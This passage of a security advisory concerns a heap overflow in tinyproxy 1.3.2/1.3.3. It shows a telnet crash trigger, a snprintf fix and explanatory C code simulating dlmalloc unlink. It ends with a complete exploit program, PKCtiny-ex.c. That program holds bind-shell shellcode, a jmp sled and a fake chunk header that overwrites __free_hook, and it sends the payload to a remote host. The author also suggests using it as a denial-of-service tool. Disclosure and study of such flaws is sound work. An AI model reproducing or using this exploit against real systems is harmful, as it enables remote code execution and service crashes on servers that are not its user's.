where BUFFER is defined as 2048.
As you can see, msg is substituted three times into outbuf by an unbounded
sprintf, so a msg longer than roughly a third of BUFFER (minus the fixed text
of premsg) overflows the heap block. We can put whatever we want in msg by
sending something other than "http://" in the connect request:
bash-2.03# telnet 0 8888
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
connect [lots of A]://
Connection closed by foreign host.
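The vulnerable shape of httperr next to the bounded form, as an added example (not tinyproxy's own code). The real premsg template is not reproduced in the advisory, so the premsg below is a constructed stand-in and the exact overflow threshold differs on the real program; what carries over is that the output grows by three bytes for every byte of msg while the heap block stays 2048 bytes, and that swapping sprintf for snprintf(outbuf, BUFFER, ...) caps the write at the block size.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER  2048      /* as in tinyproxy's utils.c */
#define VERSION "1.3.3"

/* Constructed stand-in for tinyproxy's premsg (the real template is not on
 * the page). The property that matters: msg is substituted three times. */
static const char premsg[] =
    "HTTP/1.0 %d Error\r\n\r\n"
    "<html><head><title>%s</title></head>"
    "<body><h1>%s</h1><p>%d %s</p><p>tinyproxy %s</p></body></html>\r\n";

/* Bytes sprintf would emit for this msg, not counting the terminating NUL */
size_t httperr_needed(int err, const char *msg) {
    return (size_t)snprintf(NULL, 0, premsg, err, msg, msg, err, msg, VERSION);
}

/* 1 if the unbounded sprintf would write past the BUFFER-byte heap block */
int httperr_overflows(int err, const char *msg) {
    return httperr_needed(err, msg) + 1 > BUFFER;
}

/* Vulnerable shape, as in utils.c: fixed-size heap block, unbounded write.
 * Only safe when httperr_overflows() is 0; never feed it attacker data. */
char *httperr_vuln(int err, const char *msg) {
    char *outbuf = malloc(BUFFER);
    if (!outbuf) return NULL;
    sprintf(outbuf, premsg, err, msg, msg, err, msg, VERSION);
    return outbuf;
}

/* Fixed shape, the advisory's change: bounded write, always NUL-terminated,
 * output silently truncated to BUFFER-1 characters */
char *httperr_fixed(int err, const char *msg) {
    char *outbuf = malloc(BUFFER);
    if (!outbuf) return NULL;
    snprintf(outbuf, BUFFER, premsg, err, msg, msg, err, msg, VERSION);
    return outbuf;
}

/* Length of the fixed variant's output for this msg */
size_t httperr_fixed_len(int err, const char *msg) {
    char *out = httperr_fixed(err, msg);
    size_t n = out ? strlen(out) : 0;
    free(out);
    return n;
}

/* A msg of n 'A's, i.e. what "connect AAAA...://" delivers to httperr */
const char *make_msg(size_t n) {
    static char buf[4096];
    if (n >= sizeof buf) n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Smallest msg length that makes the vulnerable sprintf overflow */
size_t min_overflow_len(int err) {
    for (size_t n = 0; n < BUFFER; n++)
        if (httperr_overflows(err, make_msg(n))) return n;
    return 0;
}

int main(void) {
    printf("fixed part of the page: %zu bytes, +3 per byte of msg\n",
           httperr_needed(400, ""));
    printf("overflow from msg length %zu; with snprintf the output is capped at %zu\n",
           min_overflow_len(400), httperr_fixed_len(400, make_msg(1000)));
    return 0;
}
```

Note that the snprintf fix only stops the memory corruption: the error page is silently cut off, which is acceptable here because it is an error response, but a caller that later parses outbuf should not assume it is complete.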
--- The solution ---

Change the sprintf into snprintf:

snprintf(outbuf,BUFFER,premsg,err,msg,msg,err,msg,VERSION);

(authors were contacted)

--- The exploitation ---

Exploiting this program is hard. The problem is that nothing is allocated
between the malloc of our buf and the bugged sprintf, so the overflow runs
off the end of our chunk into whatever happens to lie after it. To exploit
it we must overwrite some structure after our buf, but in many cases there
is nothing after it. For some values of the size of the buffer we send, the
target chunk is not at the end of the heap, so we can overwrite something.
Those values depend on which distribution you run. Unfortunately, for
Red Hat 7.0 and Slackware I wasn't able to hit the struct correctly: for the
values that make free() segfault, the chunk is not hit by a string that we
are able to control. I don't have more time to dedicate to this exploit; I
include it so that someone with more time can try it on other distros.
Anyway, you can always use it as a DoS by setting a large buf_size: the
sprintf will segfault trying to write past the end of the heap.
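Why the exploit fills mc.fd with the shellcode address and mc.bk with free_hook-8, and why c0de opens with a two-byte jmp, as an added illustration that is not part of the advisory. The fake chunk header is meant to reach the unlink() macro of the dlmalloc that glibc shipped at the time, which had no integrity check on fd/bk and therefore turns into two attacker-chosen 4-byte writes. The simulation below runs that macro over a toy 32-bit memory; the chunk, shellcode and __free_hook addresses are made up for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy 32-bit address space standing in for the target's heap and libc.
 * Every address used below is invented for the demonstration. */
#define MEM_SIZE 0x10000
static uint8_t mem[MEM_SIZE];

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

/* 32-bit dlmalloc chunk header: prev_size, size, fd, bk */
enum { OFF_PREV = 0, OFF_SIZE = 4, OFF_FD = 8, OFF_BK = 12 };

/* The unlink() macro of that era's dlmalloc, spelled out:
 *   FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD;
 * With attacker-chosen fd/bk it is two 4-byte writes to chosen addresses. */
static void dl_unlink(uint32_t p) {
    uint32_t fd = rd32(p + OFF_FD);
    uint32_t bk = rd32(p + OFF_BK);
    wr32(fd + OFF_BK, bk);   /* FD->bk = BK : clobbers shellcode+12..15        */
    wr32(bk + OFF_FD, fd);   /* BK->fd = FD : shellcode address into __free_hook */
}

/* Same header that PKCtiny-ex.c builds in struct malloc_chunk mc */
static void plant_fake_chunk(uint32_t chunk, uint32_t shellcode, uint32_t free_hook) {
    wr32(chunk + OFF_PREV, 0xffffffffu & ~1u);
    wr32(chunk + OFF_SIZE, 0xffffffffu);
    wr32(chunk + OFF_FD,   shellcode);
    wr32(chunk + OFF_BK,   free_hook - 8);
}

struct unlink_result {
    uint32_t hook_value;     /* what __free_hook holds after the unlink   */
    uint32_t clobber_value;  /* what now sits at shellcode+12             */
    int      first_jmp_ok;   /* the leading "jmp +14" survived intact     */
    int      jmp_target;     /* where that jmp lands, relative to shellcode */
};

struct unlink_result run_unlink_demo(uint32_t chunk, uint32_t shellcode, uint32_t free_hook) {
    /* first 16 bytes of c0de from the advisory: jmp +0x0e, then NOPs */
    static const uint8_t head[16] = {0xeb, 0x0e, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
                                     0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
    struct unlink_result r;
    memset(mem, 0, sizeof mem);
    memcpy(mem + shellcode, head, sizeof head);
    plant_fake_chunk(chunk, shellcode, free_hook);

    dl_unlink(chunk);   /* what free() does when it consolidates the fake chunk */

    r.hook_value    = rd32(free_hook);
    r.clobber_value = rd32(shellcode + OFF_BK);
    r.first_jmp_ok  = (mem[shellcode] == 0xeb && mem[shellcode + 1] == 0x0e);
    /* short jmp: target = end of the 2-byte instruction + signed rel8 */
    r.jmp_target    = 2 + (int8_t)mem[shellcode + 1];
    return r;
}

int main(void) {
    struct unlink_result r = run_unlink_demo(0x1000, 0x2000, 0x8000);
    printf("__free_hook  = 0x%08x (the shellcode address)\n", r.hook_value);
    printf("shellcode+12 = 0x%08x (free_hook-8, overwritten by unlink)\n", r.clobber_value);
    printf("leading jmp lands at shellcode+%d, past the clobbered bytes 12..15\n", r.jmp_target);
    return 0;
}
```

The first write lands inside the shellcode, which is why c0de starts with jmp +14: execution enters at the jmp and hops over the four bytes unlink() destroyed. On the real target the unlink only happens if free() ever consolidates with the corrupted header, and getting that header to land at a controllable distance from our buffer is exactly the per-distribution problem described above.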
--- PKCtiny-ex.c ---
/*
 * Exploit for tinyproxy 1.3.2 and 1.3.3
 * by |CyRaX| <cyrax@pkcrew.org>
 * Packet Knights Crew - www.pkcrew.org
 * READ THE ADVISORY FIRST !
 * Greetz :
 * bikappa: for some help
 * all the pkc members especially recidjvo, asynchro and cthulhu
 * all the other friends
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* sled element: "jmp +14"; pairs sit at even offsets so each jmp lands on the next */
char jmps[]="\xeb\x0e";

/* bind shell; it opens with "jmp +14" because unlink() writes 4 bytes over
 * shellcode+12 (FD->bk = BK), so the first jmp has to hop past them */
char c0de[]="\xeb\x0e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90"
 "\x89\xe5"
 "\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
 "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
 "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
 "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
 "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
 "\x80\xea\x27\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x1f\x5e"
 "\x80\x46\x04\x01"
 "\x80\x06\x01"
 "\x89\x75"
 "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
 "\x8d\x55\x0c\xcd\x80\xe8\xdc\xff\xff\xff\x2e\x62\x69\x6e\x2e\x73\x68";

void usage(){
 printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX| <cyrax@pkcrew.org>\n");
 printf("Packet Knights Crew - http://www.pkcrew.org\n");
 printf("please.. READ the advisory first!\n");
 printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset> <free_hook> <shellcode>\n");
 printf("buf_size is the size of the buf we send\n");
 printf("struct offset is the distance from the beginning of the buffer we send where we\n");
 printf(" put the malloc chunk struct!\n");
 printf("free_hook is the address of the free_hook function pointer\n");
 printf("shellcode is the address of the shellcode (you don't need to hit it exactly,\n");
 printf(" you can just hope to land on a jmp)\n");
 printf("\nfree_hook and shellcode must be given in 0xaddress format\n");
 exit(0);
}

int main(int argc, char **argv){
 int s,i,buf_size,offset;
 struct sockaddr_in dst;
 /* fake dlmalloc chunk header, 32-bit x86 layout: prev_size, size, fd, bk */
 struct malloc_chunk{
   unsigned int ps;
   unsigned int sz;
   struct malloc_chunk *fd;
   struct malloc_chunk *bk;
 }mc;
 char *magic,*sndbuff;
 unsigned long FREE_HOOKZ,SHELLCODE;

 if(argc<7)usage();                 /* argv[5] and argv[6] are used below */
 buf_size=atoi(argv[3]);
 offset=atoi(argv[4]);
 if(buf_size<=0 || offset<0 || offset+(int)sizeof(mc)>buf_size){
   fprintf(stderr,"struct offset must fit inside buf_size\n");
   exit(1);
 }
 magic=(char *)malloc(buf_size+1);
 sndbuff=(char *)malloc(buf_size+30);
 if(!magic || !sndbuff){perror("malloc");exit(1);}
 memset(magic,'\x90',buf_size);     /* NOP everywhere we don't place something else */

 SHELLCODE=strtoul(argv[6],NULL,16);
 FREE_HOOKZ=strtoul(argv[5],NULL,16);

 memset(&dst,0,sizeof(dst));
 dst.sin_addr.s_addr=inet_addr(argv[1]);
 dst.sin_port=htons(atoi(argv[2]));
 dst.sin_family=AF_INET;

 /* unlink(): FD->bk = BK puts free_hook-8 at shellcode+12,
  *           BK->fd = FD puts the shellcode address into __free_hook */
 mc.ps=0xffffffff & ~1;
 mc.sz=0xffffffff;
 mc.fd=(struct malloc_chunk *)(SHELLCODE);
 mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);

 s=socket(AF_INET,SOCK_STREAM,0);
 if(s<0 || connect(s,(struct sockaddr *)&dst,sizeof(dst))<0){
   perror("connect");
   exit(1);
 }
 memcpy(magic+offset,&mc,sizeof(mc));

 if((buf_size/2)<offset){
   /* putting jmps and shellcode before the struct */
   for(i=0;i<offset-(int)strlen(c0de)-10;i+=2){
     memcpy(magic+i,jmps,2);
   }
 }
 else {
   /* putting jmps and shellcode after the struct */
   for(i=offset+(int)sizeof(mc);i<buf_size-10-(int)strlen(c0de);i+=2){
     memcpy(magic+i,jmps,2);
   }
 }
 if(i+(int)strlen(c0de)>buf_size){
   fprintf(stderr,"no room for the shellcode with this buf_size/offset\n");
   exit(1);
 }
 memcpy(magic+i,c0de,strlen(c0de));
 magic[buf_size]=0;

 printf("strlen magic is %lu\n",(unsigned long)strlen(magic));
 sndbuff[snprintf(sndbuff,buf_size+20,"connect %s://\n",magic)]=0;
 printf("shooting\n");
 if(send(s,sndbuff,strlen(sndbuff),0)<0)perror("send");
 close(s);
 return 0;
}
EOF
|CyRaX|
Member Of Packet Knights Crew
www.pkcrew.org